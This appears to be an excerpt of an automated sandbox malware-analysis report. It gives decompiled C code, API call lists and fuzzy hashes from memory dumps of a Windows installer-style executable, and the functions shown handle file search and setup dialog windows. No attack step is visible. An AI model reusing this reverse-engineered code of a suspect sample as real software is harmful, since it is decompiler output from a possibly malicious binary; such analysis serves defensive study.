                                                                        • C:\Users\user\AppData\Local\Temp, xrefs: 00402131
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.656376259.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.656371436.0000000000400000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656383603.0000000000407000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656389325.0000000000409000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656419100.000000000077A000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656424293.0000000000784000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656429564.0000000000788000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656484427.0000000000795000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656489285.00000000007A1000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656510078.00000000007A9000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656514885.00000000007AC000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID: ByteCharCreateInstanceMultiWide
                                                                        • String ID: C:\Users\user\AppData\Local\Temp
                                                                        • API String ID: 123533781-47812868
                                                                        • Opcode ID: 751c6343f30b53ff87cb2a36cb9a8fc5fe581f53ea8e30dae2934d6634253110
                                                                        • Instruction ID: 6da020dad1963d07c1d5d6cba7c730fbb78a3e39a4a6f028781d9f3b25516250
                                                                        • Opcode Fuzzy Hash: 751c6343f30b53ff87cb2a36cb9a8fc5fe581f53ea8e30dae2934d6634253110
                                                                        • Instruction Fuzzy Hash: 0D417D75A00215BFCB00DFA8CD88E9E7BB6FF89315B20416AF905EB2D1CA759D41CB64
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 39%
                                                                        			E004026BC(char __ebx, CHAR* __edi, char* __esi) {
                                                                        				void* _t19;
                                                                        
                                                                        				if(FindFirstFileA(E00402A9A(2), _t19 - 0x1a4) != 0xffffffff) {
                                                                        					E0040591D(__edi, _t6);
                                                                        					_push(_t19 - 0x178);
                                                                        					_push(__esi);
                                                                        					E004059BF();
                                                                        				} else {
                                                                        					 *((char*)(__edi)) = __ebx;
                                                                        					 *__esi = __ebx;
                                                                        					 *((intOrPtr*)(_t19 - 4)) = 1;
                                                                        				}
                                                                        				 *0x7a3008 =  *0x7a3008 +  *((intOrPtr*)(_t19 - 4));
                                                                        				return 0;
                                                                        			}




                                                                        0x004026d4
                                                                        0x004026e8
                                                                        0x004026f3
                                                                        0x004026f4
                                                                        0x00402855
                                                                        0x004026d6
                                                                        0x004026d6
                                                                        0x004026d8
                                                                        0x004026da
                                                                        0x004026da
                                                                        0x00402932
                                                                        0x0040293e

                                                                        APIs
                                                                        • FindFirstFileA.KERNEL32(00000000,?,00000002), ref: 004026CB
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.656376259.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.656371436.0000000000400000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656383603.0000000000407000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656389325.0000000000409000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656419100.000000000077A000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656424293.0000000000784000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656429564.0000000000788000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656484427.0000000000795000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656489285.00000000007A1000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656510078.00000000007A9000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656514885.00000000007AC000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID: FileFindFirst
                                                                        • String ID:
                                                                        • API String ID: 1974802433-0
                                                                        • Opcode ID: 9223db83c99603c3289ccd37b6b2a6db7d53f2a3e2294c42d49ba21f7ea334b2
                                                                        • Instruction ID: fa0b3d5524a7ec5f3b356c4eb27d29c110ff1bfb4a1b37a6377ddf9626cce4e3
                                                                        • Opcode Fuzzy Hash: 9223db83c99603c3289ccd37b6b2a6db7d53f2a3e2294c42d49ba21f7ea334b2
                                                                        • Instruction Fuzzy Hash: EBF0A0B2608110DBE701EBA49E49AEEB768DF52324F60417BE141B20C1D6B84A44DA2A
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.656919763.00000000026C0000.00000040.00000001.sdmp, Offset: 026C0000, based on PE: false
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 4190573f41b5aaf3d97b7b4ebc131eb1ca3e1ee9d0b453c61c3dcd2709d33944
                                                                        • Instruction ID: 3b8a23052aa74c215c4f1671029b27e158a1291e860f2c40aff43fb71103cab5
                                                                        • Opcode Fuzzy Hash: 4190573f41b5aaf3d97b7b4ebc131eb1ca3e1ee9d0b453c61c3dcd2709d33944
                                                                        • Instruction Fuzzy Hash: 75010C78E15208EFDB41DF98C5849ADBBF5FB09620F2585EAE818E7711D330AE509B40
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.656919763.00000000026C0000.00000040.00000001.sdmp, Offset: 026C0000, based on PE: false
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: f9ed70d17b65b173f63ea8bde167bd4dbe7c19cd1b27e585218ed96e6e4df4c6
                                                                        • Instruction ID: 58c6f5837427d6eca2c2deaad74ce6c6656098581891570576efec04afcca601
                                                                        • Opcode Fuzzy Hash: f9ed70d17b65b173f63ea8bde167bd4dbe7c19cd1b27e585218ed96e6e4df4c6
                                                                        • Instruction Fuzzy Hash: 42D001392A1A48CFC241CF4CD084E40B3F8FB0DA20B068092FA0A8BB32C334FC00DA80
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 77%
                                                                        			E004038BF(struct HWND__* _a4, int _a8, int _a12, long _a16) {
                                                                        				void* _v84;
                                                                        				void* _v88;
                                                                        				void* __ebx;
                                                                        				void* __edi;
                                                                        				void* __esi;
                                                                        				signed int _t33;
                                                                        				signed int _t35;
                                                                        				struct HWND__* _t37;
                                                                        				struct HWND__* _t47;
                                                                        				struct HWND__* _t65;
                                                                        				struct HWND__* _t71;
                                                                        				struct HWND__* _t84;
                                                                        				struct HWND__* _t89;
                                                                        				struct HWND__* _t97;
                                                                        				int _t101;
                                                                        				int _t104;
                                                                        				struct HWND__* _t117;
                                                                        				struct HWND__* _t120;
                                                                        				signed int _t122;
                                                                        				struct HWND__* _t127;
                                                                        				long _t132;
                                                                        				int _t134;
                                                                        				int _t135;
                                                                        				struct HWND__* _t136;
                                                                        				void* _t139;
                                                                        
                                                                        				_t135 = _a8;
                                                                        				if(_t135 == 0x110 || _t135 == 0x408) {
                                                                        					_t33 = _a12;
                                                                        					_t117 = _a4;
                                                                        					__eflags = _t135 - 0x110;
                                                                        					 *0x79f56c = _t33;
                                                                        					if(_t135 == 0x110) {
                                                                        						 *0x7a2f84 = _t117;
                                                                        						 *0x79f57c = GetDlgItem(_t117, 1);
                                                                        						_t89 = GetDlgItem(_t117, 2);
                                                                        						_push(0xffffffff);
                                                                        						_push(0x1c);
                                                                        						 *0x79e548 = _t89;
                                                                        						E00403DA7(_t117);
                                                                        						SetClassLongA(_t117, 0xfffffff2,  *0x7a2768);
                                                                        						 *0x7a274c = E00401410(4);
                                                                        						_t33 = 1;
                                                                        						__eflags = 1;
                                                                        						 *0x79f56c = 1;
                                                                        					}
                                                                        					_t120 =  *0x409284; // 0xffffffff
                                                                        					_t132 = (_t120 << 6) +  *0x7a2fa0;
                                                                        					__eflags = _t120;
                                                                        					if(_t120 < 0) {
                                                                        						L38:
                                                                        						E00403DF3(0x40b);
                                                                        						while(1) {
                                                                        							_t35 =  *0x79f56c;
                                                                        							 *0x409284 =  *0x409284 + _t35;
                                                                        							_t132 = _t132 + (_t35 << 6);
                                                                        							_t37 =  *0x409284; // 0xffffffff
                                                                        							__eflags = _t37 -  *0x7a2fa4;
                                                                        							if(_t37 ==  *0x7a2fa4) {
                                                                        								E00401410(1);
                                                                        							}
                                                                        							__eflags =  *0x7a274c;
                                                                        							if( *0x7a274c != 0) {
                                                                        								break;
                                                                        							}
                                                                        							__eflags =  *0x409284 -  *0x7a2fa4; // 0xffffffff
                                                                        							if(__eflags >= 0) {
                                                                        								break;
                                                                        							}
                                                                        							_push( *((intOrPtr*)(_t132 + 0x24)));
                                                                        							_t122 =  *(_t132 + 0x14);
                                                                        							_push(0x7ab000);
                                                                        							E004059E1(_t117, _t122, _t132);
                                                                        							_push( *((intOrPtr*)(_t132 + 0x20)));
                                                                        							_push(0xfffffc19);
                                                                        							E00403DA7(_t117);
                                                                        							_push( *((intOrPtr*)(_t132 + 0x1c)));
                                                                        							_push(0xfffffc1b);
                                                                        							E00403DA7(_t117);
                                                                        							_push( *((intOrPtr*)(_t132 + 0x28)));
                                                                        							_push(0xfffffc1a);
                                                                        							E00403DA7(_t117);
                                                                        							_t47 = GetDlgItem(_t117, 3);
                                                                        							__eflags =  *0x7a300c;
                                                                        							_t136 = _t47;
                                                                        							if( *0x7a300c != 0) {
                                                                        								_t122 = _t122 & 0x0000fefd | 0x00000004;
                                                                        								__eflags = _t122;
                                                                        							}
                                                                        							ShowWindow(_t136, _t122 & 0x00000008);
                                                                        							EnableWindow(_t136, _t122 & 0x00000100);
                                                                        							E00403DC9(_t122 & 0x00000002);
                                                                        							EnableWindow( *0x79e548, _t122 & 0x00000004);
                                                                        							SendMessageA(_t136, 0xf4, 0, 1);
                                                                        							__eflags =  *0x7a300c;
                                                                        							if( *0x7a300c == 0) {
                                                                        								_push( *0x79f57c);
                                                                        							} else {
                                                                        								SendMessageA(_t117, 0x401, 2, 0);
                                                                        								_push( *0x79e548);
                                                                        							}
                                                                        							E00403DDC();
                                                                        							E004059BF(0x79f580, 0x7a2780);
                                                                        							_push( *((intOrPtr*)(_t132 + 0x18)));
                                                                        							_push( &(0x79f580[lstrlenA(0x79f580)]));
                                                                        							E004059E1(_t117, 0, _t132);
                                                                        							SetWindowTextA(_t117, 0x79f580);
                                                                        							_push(0);
                                                                        							_t65 = E0040136D( *((intOrPtr*)(_t132 + 8)));
                                                                        							__eflags = _t65;
                                                                        							if(_t65 != 0) {
                                                                        								continue;
                                                                        							} else {
                                                                        								__eflags =  *_t132 - _t65;
                                                                        								if( *_t132 == _t65) {
                                                                        									continue;
                                                                        								}
                                                                        								__eflags =  *(_t132 + 4) - 5;
                                                                        								if( *(_t132 + 4) != 5) {
                                                                        									DestroyWindow( *0x7a2758);
                                                                        									 *0x79ed58 = _t132;
                                                                        									__eflags =  *_t132;
                                                                        									if( *_t132 > 0) {
                                                                        										_t71 = CreateDialogParamA( *0x7a2f80,  *_t132 +  *0x7a2760 & 0x0000ffff, _t117,  *(0x409288 +  *(_t132 + 4) * 4), _t132);
                                                                        										__eflags = _t71;
                                                                        										 *0x7a2758 = _t71;
                                                                        										if(_t71 != 0) {
                                                                        											_push( *((intOrPtr*)(_t132 + 0x2c)));
                                                                        											_push(6);
                                                                        											E00403DA7(_t71);
                                                                        											GetWindowRect(GetDlgItem(_t117, 0x3fa), _t139 + 0x10);
                                                                        											ScreenToClient(_t117, _t139 + 0x10);
                                                                        											SetWindowPos( *0x7a2758, 0,  *(_t139 + 0x20),  *(_t139 + 0x20), 0, 0, 0x15);
                                                                        											_push(0);
                                                                        											E0040136D( *((intOrPtr*)(_t132 + 0xc)));
                                                                        											ShowWindow( *0x7a2758, 8);
                                                                        											E00403DF3(0x405);
                                                                        										}
                                                                        									}
                                                                        									goto L58;
                                                                        								}
                                                                        								__eflags =  *0x7a300c - _t65;
                                                                        								if( *0x7a300c != _t65) {
                                                                        									goto L61;
                                                                        								}
                                                                        								__eflags =  *0x7a3000 - _t65;
                                                                        								if( *0x7a3000 != _t65) {
                                                                        									continue;
                                                                        								}
                                                                        								goto L61;
                                                                        							}
                                                                        						}
                                                                        						DestroyWindow( *0x7a2758);
                                                                        						 *0x7a2f84 =  *0x7a2f84 & 0x00000000;
                                                                        						__eflags =  *0x7a2f84;
                                                                        						EndDialog(_t117,  *0x79e950);
                                                                        						goto L58;
                                                                        					} else {
                                                                        						__eflags = _t33 - 1;
                                                                        						if(_t33 != 1) {
                                                                        							L37:
                                                                        							__eflags =  *_t132;
                                                                        							if( *_t132 == 0) {
                                                                        								goto L61;
                                                                        							}
                                                                        							goto L38;
                                                                        						}
                                                                        						_push(0);
                                                                        						_t84 = E0040136D( *((intOrPtr*)(_t132 + 0x10)));
                                                                        						__eflags = _t84;
                                                                        						if(_t84 == 0) {
                                                                        							goto L37;
                                                                        						}
                                                                        						SendMessageA( *0x7a2758, 0x40f, 0, 1);
                                                                        						__eflags =  *0x7a274c;
                                                                        						return 0 |  *0x7a274c == 0x00000000;
                                                                        					}
                                                                        				} else {
                                                                        					_t117 = _a4;
                                                                        					if(_t135 == 0x47) {
                                                                        						SetWindowPos( *0x79f560, _t117, 0, 0, 0, 0, 0x13);
                                                                        					}
                                                                        					if(_t135 == 5) {
                                                                        						asm("sbb eax, eax");
                                                                        						ShowWindow( *0x79f560,  ~(_a12 - 1) & _t135);
                                                                        					}
                                                                        					if(_t135 != 0x40d) {
                                                                        						__eflags = _t135 - 0x11;
                                                                        						if(_t135 != 0x11) {
                                                                        							__eflags = _t135 - 0x10;
                                                                        							if(_t135 != 0x10) {
                                                                        								L14:
                                                                        								__eflags = _t135 - 0x111;
                                                                        								if(_t135 != 0x111) {
                                                                        									L30:
                                                                        									return E00403E0E(_t135, _a12, _a16);
                                                                        								}
                                                                        								_t134 = _a12 & 0x0000ffff;
                                                                        								_t127 = GetDlgItem(_t117, _t134);
                                                                        								__eflags = _t127;
                                                                        								if(_t127 == 0) {
                                                                        									L17:
                                                                        									__eflags = _t134 - 1;
                                                                        									if(_t134 != 1) {
                                                                        										__eflags = _t134 - 3;
                                                                        										if(_t134 != 3) {
                                                                        											__eflags = _t134 - 2;
                                                                        											if(_t134 != 2) {
                                                                        												L29:
                                                                        												SendMessageA( *0x7a2758, 0x111, _a12, _a16);
                                                                        												goto L30;
                                                                        											}
                                                                        											__eflags =  *0x7a300c;
                                                                        											if( *0x7a300c == 0) {
                                                                        												_t97 = E00401410(3);
                                                                        												__eflags = _t97;
                                                                        												if(_t97 != 0) {
                                                                        													goto L30;
                                                                        												}
                                                                        												 *0x79e950 = 1;
                                                                        												L25:
                                                                        												_push(0x78);
                                                                        												L26:
                                                                        												E00403D80();
                                                                        												goto L30;
                                                                        											}
                                                                        											E00401410(_t134);
                                                                        											 *0x79e950 = _t134;
                                                                        											goto L25;
                                                                        										}
                                                                        										__eflags =  *0x409284;
                                                                        										if( *0x409284 <= 0) {
                                                                        											goto L29;
                                                                        										}
                                                                        										_push(0xffffffff);
                                                                        										goto L26;
                                                                        									}
                                                                        									_push(1);
                                                                        									goto L26;
                                                                        								}
                                                                        								SendMessageA(_t127, 0xf3, 0, 0);
                                                                        								_t101 = IsWindowEnabled(_t127);
                                                                        								__eflags = _t101;
                                                                        								if(_t101 == 0) {
                                                                        									goto L61;
                                                                        								}
                                                                        								goto L17;
                                                                        							}
                                                                        							__eflags =  *0x409284 -  *0x7a2fa4 - 1; // 0xffffffff
                                                                        							if(__eflags != 0) {
                                                                        								goto L30;
                                                                        							}
                                                                        							_t104 = IsWindowEnabled( *0x79e548);
                                                                        							__eflags = _t104;
                                                                        							if(_t104 != 0) {
                                                                        								goto L30;
                                                                        							}
                                                                        							_t135 = 0x111;
                                                                        							_a12 = 1;
                                                                        							goto L14;
                                                                        						}
                                                                        						SetWindowLongA(_t117, 0, 0);
                                                                        						return 1;
                                                                        					} else {
                                                                        						DestroyWindow( *0x7a2758);
                                                                        						 *0x7a2758 = _a12;
                                                                        						L58:
                                                                        						if( *0x7a0580 == 0 &&  *0x7a2758 != 0) {
                                                                        							ShowWindow(_t117, 0xa);
                                                                        							 *0x7a0580 = 1;
                                                                        						}
                                                                        						L61:
                                                                        						return 0;
                                                                        					}
                                                                        				}
                                                                        			}




























                                                                        0x004038c9
                                                                        0x004038d1
                                                                        0x00403a4a
                                                                        0x00403a4e
                                                                        0x00403a52
                                                                        0x00403a54
                                                                        0x00403a59
                                                                        0x00403a64
                                                                        0x00403a6f
                                                                        0x00403a74
                                                                        0x00403a76
                                                                        0x00403a78
                                                                        0x00403a7b
                                                                        0x00403a80
                                                                        0x00403a8e
                                                                        0x00403a9b
                                                                        0x00403aa2
                                                                        0x00403aa2
                                                                        0x00403aa3
                                                                        0x00403aa3
                                                                        0x00403aa8
                                                                        0x00403ab5
                                                                        0x00403abb
                                                                        0x00403abd
                                                                        0x00403afd
                                                                        0x00403b02
                                                                        0x00403b07
                                                                        0x00403b07
                                                                        0x00403b0c
                                                                        0x00403b15
                                                                        0x00403b17
                                                                        0x00403b1c
                                                                        0x00403b22
                                                                        0x00403b26
                                                                        0x00403b26
                                                                        0x00403b2b
                                                                        0x00403b32
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00403b3d
                                                                        0x00403b43
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00403b49
                                                                        0x00403b4c
                                                                        0x00403b4f
                                                                        0x00403b54
                                                                        0x00403b59
                                                                        0x00403b5c
                                                                        0x00403b62
                                                                        0x00403b67
                                                                        0x00403b6a
                                                                        0x00403b70
                                                                        0x00403b75
                                                                        0x00403b78
                                                                        0x00403b7e
                                                                        0x00403b86
                                                                        0x00403b8c
                                                                        0x00403b93
                                                                        0x00403b95
                                                                        0x00403b9c
                                                                        0x00403b9c
                                                                        0x00403b9c
                                                                        0x00403ba6
                                                                        0x00403bb5
                                                                        0x00403bc1
                                                                        0x00403bd0
                                                                        0x00403be7
                                                                        0x00403be9
                                                                        0x00403bef
                                                                        0x00403c04
                                                                        0x00403bf1
                                                                        0x00403bfa
                                                                        0x00403bfc
                                                                        0x00403bfc
                                                                        0x00403c0a
                                                                        0x00403c1a
                                                                        0x00403c1f
                                                                        0x00403c2a
                                                                        0x00403c2b
                                                                        0x00403c32
                                                                        0x00403c38
                                                                        0x00403c3c
                                                                        0x00403c41
                                                                        0x00403c43
                                                                        0x00000000
                                                                        0x00403c49
                                                                        0x00403c49
                                                                        0x00403c4b
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00403c51
                                                                        0x00403c55
                                                                        0x00403c7a
                                                                        0x00403c80
                                                                        0x00403c86
                                                                        0x00403c89
                                                                        0x00403caf
                                                                        0x00403cb5
                                                                        0x00403cb7
                                                                        0x00403cbc
                                                                        0x00403cc2
                                                                        0x00403cc5
                                                                        0x00403cc8
                                                                        0x00403cdf
                                                                        0x00403ceb
                                                                        0x00403d06
                                                                        0x00403d0c
                                                                        0x00403d10
                                                                        0x00403d1d
                                                                        0x00403d28
                                                                        0x00403d28
                                                                        0x00403cbc
                                                                        0x00000000
                                                                        0x00403c89
                                                                        0x00403c57
                                                                        0x00403c5d
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00403c63
                                                                        0x00403c69
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00403c6f
                                                                        0x00403c43
                                                                        0x00403d35
                                                                        0x00403d41
                                                                        0x00403d41
                                                                        0x00403d49
                                                                        0x00000000
                                                                        0x00403abf
                                                                        0x00403abf
                                                                        0x00403ac2
                                                                        0x00403af5
                                                                        0x00403af5
                                                                        0x00403af7
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00403af7
                                                                        0x00403ac4
                                                                        0x00403ac8
                                                                        0x00403acd
                                                                        0x00403acf
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00403adf
                                                                        0x00403ae7
                                                                        0x00000000
                                                                        0x00403aed
                                                                        0x004038e3
                                                                        0x004038e3
                                                                        0x004038ea
                                                                        0x004038fb
                                                                        0x004038fb
                                                                        0x00403904
                                                                        0x0040390d
                                                                        0x00403918
                                                                        0x00403918
                                                                        0x00403924
                                                                        0x00403940
                                                                        0x00403943
                                                                        0x00403958
                                                                        0x0040395b
                                                                        0x00403990
                                                                        0x00403990
                                                                        0x00403996
                                                                        0x00403a37
                                                                        0x00000000
                                                                        0x00403a40
                                                                        0x0040399c
                                                                        0x004039af
                                                                        0x004039b1
                                                                        0x004039b3
                                                                        0x004039d0
                                                                        0x004039d3
                                                                        0x004039d5
                                                                        0x004039da
                                                                        0x004039dd
                                                                        0x004039ec
                                                                        0x004039ef
                                                                        0x00403a22
                                                                        0x00403a35
                                                                        0x00000000
                                                                        0x00403a35
                                                                        0x004039f1
                                                                        0x004039f8
                                                                        0x00403a11
                                                                        0x00403a16
                                                                        0x00403a18
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00403a1a
                                                                        0x00403a06
                                                                        0x00403a06
                                                                        0x00403a08
                                                                        0x00403a08
                                                                        0x00000000
                                                                        0x00403a08
                                                                        0x004039fb
                                                                        0x00403a00
                                                                        0x00000000
                                                                        0x00403a00
                                                                        0x004039df
                                                                        0x004039e6
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x004039e8
                                                                        0x00000000
                                                                        0x004039e8
                                                                        0x004039d7
                                                                        0x00000000
                                                                        0x004039d7
                                                                        0x004039bf
                                                                        0x004039c2
                                                                        0x004039c8
                                                                        0x004039ca
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x004039ca
                                                                        0x00403963
                                                                        0x00403969
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00403975
                                                                        0x0040397b
                                                                        0x0040397d
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00403983
                                                                        0x00403988
                                                                        0x00000000
                                                                        0x00403988
                                                                        0x0040394a
                                                                        0x00000000
                                                                        0x00403926
                                                                        0x0040392c
                                                                        0x00403936
                                                                        0x00403d4f
                                                                        0x00403d56
                                                                        0x00403d64
                                                                        0x00403d6a
                                                                        0x00403d6a
                                                                        0x00403d74
                                                                        0x00000000
                                                                        0x00403d74
                                                                        0x00403924

                                                                        APIs
                                                                        • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 004038FB
                                                                        • ShowWindow.USER32(?), ref: 00403918
                                                                        • DestroyWindow.USER32 ref: 0040392C
                                                                        • SetWindowLongA.USER32 ref: 0040394A
                                                                        • IsWindowEnabled.USER32 ref: 00403975
                                                                        • GetDlgItem.USER32 ref: 004039A3
                                                                        • SendMessageA.USER32(00000000,000000F3,00000000,00000000), ref: 004039BF
                                                                        • IsWindowEnabled.USER32(00000000), ref: 004039C2
                                                                        • GetDlgItem.USER32 ref: 00403A6A
                                                                        • GetDlgItem.USER32 ref: 00403A74
                                                                        • SetClassLongA.USER32(?,000000F2,?,0000001C,000000FF), ref: 00403A8E
                                                                        • SendMessageA.USER32(0000040F,00000000,00000001,?), ref: 00403ADF
                                                                        • GetDlgItem.USER32 ref: 00403B86
                                                                        • ShowWindow.USER32(00000000,?), ref: 00403BA6
                                                                        • EnableWindow.USER32(00000000,?), ref: 00403BB5
                                                                        • EnableWindow.USER32(?,?), ref: 00403BD0
                                                                        • SendMessageA.USER32(00000000,000000F4,00000000,00000001), ref: 00403BE7
                                                                        • SendMessageA.USER32(?,00000401,00000002,00000000), ref: 00403BFA
                                                                        • lstrlenA.KERNEL32(0079F580,?,0079F580,007A2780), ref: 00403C23
                                                                        • SetWindowTextA.USER32(?,0079F580), ref: 00403C32
                                                                        • ShowWindow.USER32(?,0000000A), ref: 00403D64
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.656376259.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.656371436.0000000000400000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656383603.0000000000407000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656389325.0000000000409000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656419100.000000000077A000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656424293.0000000000784000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656429564.0000000000788000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656484427.0000000000795000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656489285.00000000007A1000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656510078.00000000007A9000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656514885.00000000007AC000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID: Window$ItemMessageSend$Show$EnableEnabledLong$ClassDestroyTextlstrlen
                                                                        • String ID:
                                                                        • API String ID: 3950083612-0
                                                                        • Opcode ID: fa4e3fe4f8128de32ab5ebeb5ac9453328a33fd8f116c2f1de342d397e391704
                                                                        • Instruction ID: 5dd3c4f218cf3e404d6a97a2e5ce8d1cdd0b8388a563f9de6f37f2f8e87629b5
                                                                        • Opcode Fuzzy Hash: fa4e3fe4f8128de32ab5ebeb5ac9453328a33fd8f116c2f1de342d397e391704
                                                                        • Instruction Fuzzy Hash: 9DC1CC70904200AFD720AF25ED45E277FADEB89706F00453AF641B52F2D67DAA42CB1D
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 92%
                                                                        			E00403EEF(struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, int _a16) {
                                                                        				char* _v8;
                                                                        				signed int _v12;
                                                                        				void* _v16;
                                                                        				struct HWND__* _t52;
                                                                        				long _t86;
                                                                        				int _t98;
                                                                        				struct HWND__* _t99;
                                                                        				signed int _t100;
                                                                        				intOrPtr _t109;
                                                                        				int _t110;
                                                                        				signed int* _t112;
                                                                        				signed int _t113;
                                                                        				char* _t114;
                                                                        				CHAR* _t115;
                                                                        
                                                                        				if(_a8 != 0x110) {
                                                                        					if(_a8 != 0x111) {
                                                                        						L11:
                                                                        						if(_a8 != 0x4e) {
                                                                        							if(_a8 == 0x40b) {
                                                                        								 *0x79f568 =  *0x79f568 + 1;
                                                                        							}
                                                                        							L25:
                                                                        							_t110 = _a16;
                                                                        							L26:
                                                                        							return E00403E0E(_a8, _a12, _t110);
                                                                        						}
                                                                        						_t52 = GetDlgItem(_a4, 0x3e8);
                                                                        						_t110 = _a16;
                                                                        						if( *((intOrPtr*)(_t110 + 8)) == 0x70b &&  *((intOrPtr*)(_t110 + 0xc)) == 0x201) {
                                                                        							_t100 =  *((intOrPtr*)(_t110 + 0x1c));
                                                                        							_t109 =  *((intOrPtr*)(_t110 + 0x18));
                                                                        							_v12 = _t100;
                                                                        							_v16 = _t109;
                                                                        							_v8 = 0x7a1f20;
                                                                        							if(_t100 - _t109 < 0x800) {
                                                                        								SendMessageA(_t52, 0x44b, 0,  &_v16);
                                                                        								SetCursor(LoadCursorA(0, 0x7f02));
                                                                        								ShellExecuteA(_a4, "open", _v8, 0, 0, 1);
                                                                        								SetCursor(LoadCursorA(0, 0x7f00));
                                                                        								_t110 = _a16;
                                                                        							}
                                                                        						}
                                                                        						if( *((intOrPtr*)(_t110 + 8)) != 0x700 ||  *((intOrPtr*)(_t110 + 0xc)) != 0x100) {
                                                                        							goto L26;
                                                                        						} else {
                                                                        							if( *((intOrPtr*)(_t110 + 0x10)) == 0xd) {
                                                                        								SendMessageA( *0x7a2f84, 0x111, 1, 0);
                                                                        							}
                                                                        							if( *((intOrPtr*)(_t110 + 0x10)) == 0x1b) {
                                                                        								SendMessageA( *0x7a2f84, 0x10, 0, 0);
                                                                        							}
                                                                        							return 1;
                                                                        						}
                                                                        					}
                                                                        					if(_a12 >> 0x10 != 0 ||  *0x79f568 != 0) {
                                                                        						goto L25;
                                                                        					} else {
                                                                        						_t112 =  *0x79ed58 + 0x14;
                                                                        						if(( *_t112 & 0x00000020) == 0) {
                                                                        							goto L25;
                                                                        						}
                                                                        						 *_t112 =  *_t112 & 0xfffffffe | SendMessageA(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001;
                                                                        						E00403DC9(SendMessageA(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001);
                                                                        						E0040417A();
                                                                        						goto L11;
                                                                        					}
                                                                        				}
                                                                        				_t98 = _a16;
                                                                        				_t113 =  *(_t98 + 0x30);
                                                                        				if(_t113 < 0) {
                                                                        					_t113 =  *( *0x7a275c - 4 + _t113 * 4);
                                                                        				}
                                                                        				_push( *((intOrPtr*)(_t98 + 0x34)));
                                                                        				_t114 = _t113 +  *0x7a2fb8;
                                                                        				_push(0x22);
                                                                        				_a16 =  *_t114;
                                                                        				_v12 = _v12 & 0x00000000;
                                                                        				_t115 = _t114 + 1;
                                                                        				_v16 = _t115;
                                                                        				_v8 = E00403EBB;
                                                                        				E00403DA7(_a4);
                                                                        				_push( *((intOrPtr*)(_t98 + 0x38)));
                                                                        				_push(0x23);
                                                                        				E00403DA7(_a4);
                                                                        				CheckDlgButton(_a4, (0 | ( !( *(_t98 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t98 + 0x14) & 0x00000001) == 0x00000000) + 0x40a, 1);
